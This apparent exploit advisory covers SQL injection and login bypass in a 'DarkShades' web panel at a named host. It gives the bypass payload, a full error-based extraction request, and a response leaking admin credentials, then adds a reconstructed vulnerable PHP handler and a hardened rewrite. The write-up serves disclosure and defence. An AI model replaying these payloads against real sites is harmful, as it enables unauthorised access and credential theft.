DarkShades Unauthenticated SQL Injection - Malwr


Date: 2020-04-28

DarkShades Unauthenticated SQL Injection and Login Bypass

Username: '=' 'or'

Password: '=' 'or'

--------------------------------------------

Request:

POST /Dark/zathura/auth.php HTTP/1.1
Host: vandroid.xyz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://vandroid.xyz
Connection: close
Referer: http://vandroid.xyz/Dark/index.php
Cookie: PHPSESSID=499e5435824b3370c5f00e20481226c5
Upgrade-Insecure-Requests: 1

user_id=asd&user_pass=adsd'and extractvalue(1,concat(1,(select concat(clm_userid,0x3a,clm_password) from tbl_user limit 0,1)))-- -

Response:

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/7.2.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 40
Vary: Accept-Encoding
Date: Mon, 27 Apr 2020 21:11:41 GMT
Server: LiteSpeed

XPATH syntax error: 'admin:[email protected]#'

http://vandroid.xyz/Dark/zathura/home.php
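Both findings above (the '=' 'or' login bypass and the extractvalue() error-based extraction) come from the same defect: auth.php interpolates user_id and user_pass straight into a MySQL query and returns the driver's error text to the client. The following is an added illustration, not DarkShades' own code: a login handler in the shape the request and response imply, placed beside a hardened rewrite. The table and column names (tbl_user, clm_userid, clm_password) and the POST field names are taken from the page; the PDO connection details, the use of password_hash() storage and the redirect target are assumptions.

```php
<?php
// Added illustration, not code from the DarkShades panel. Table/column and
// POST field names come from the write-up; everything else is assumed.
session_start();

// --- Vulnerable pattern (assumed reconstruction of what auth.php does) ----
// Both POST fields land in the SQL string unescaped, so a quote in either
// field changes the query: '=' 'or' makes the WHERE clause true for every
// row, and an injected extractvalue() makes MySQL print selected data in
// the XPATH error that die() then hands back to the client.
function vulnerable_login(mysqli $db, string $user, string $pass): bool
{
    $sql = "SELECT clm_userid FROM tbl_user "
         . "WHERE clm_userid='$user' AND clm_password='$pass'";
    $res = $db->query($sql);
    if ($res === false) {
        die($db->error);        // this is the "XPATH syntax error: ..." line
    }
    return $res->num_rows > 0;
}

// --- Hardened version -----------------------------------------------------
// A precomputed dummy hash keeps the miss path as slow as the hit path, so a
// caller cannot tell valid usernames from invalid ones by response time.
const DUMMY_HASH = '$2y$10$abcdefghijklmnopqrstuuJ1bLbs6Gk5Tbqr8gRW7kbLZJYw5PPyW'; // constructed

function safe_login(PDO $db, string $user, string $pass): bool
{
    // Prepared statement: the username is bound as a value and can never be
    // parsed as SQL, whatever characters it contains.
    $stmt = $db->prepare(
        'SELECT clm_password FROM tbl_user WHERE clm_userid = :u LIMIT 1'
    );
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Passwords are stored as password_hash() output, so the table never
    // holds the clear-text value that the page's error message leaked.
    $stored = ($row !== false) ? $row['clm_password'] : DUMMY_HASH;
    $ok = password_verify($pass, $stored);
    return $row !== false && $ok;
}

// Assumed connection; exceptions are logged server-side, never echoed.
$db = new PDO('mysql:host=localhost;dbname=dark;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares
]);

$user = $_POST['user_id']   ?? '';
$pass = $_POST['user_pass'] ?? '';

try {
    $ok = safe_login($db, $user, $pass);
} catch (PDOException $e) {
    error_log('auth.php: ' . $e->getMessage());   // log, do not return to client
    $ok = false;
}

if (!$ok) {
    http_response_code(401);
    exit('Login failed');       // one generic message for every failure cause
}

session_regenerate_id(true);    // fresh session id after privilege change
$_SESSION['user'] = $user;
header('Location: /Dark/zathura/home.php');
```

Two properties of the hardened handler map directly onto the two findings: the bound parameter removes the login bypass, and routing PDOException to error_log() instead of the response body removes the error channel that extractvalue() relied on. Monitoring the web log for 401 responses from auth.php, and for application log lines beginning with "auth.php:", gives a cheap detection signal for both.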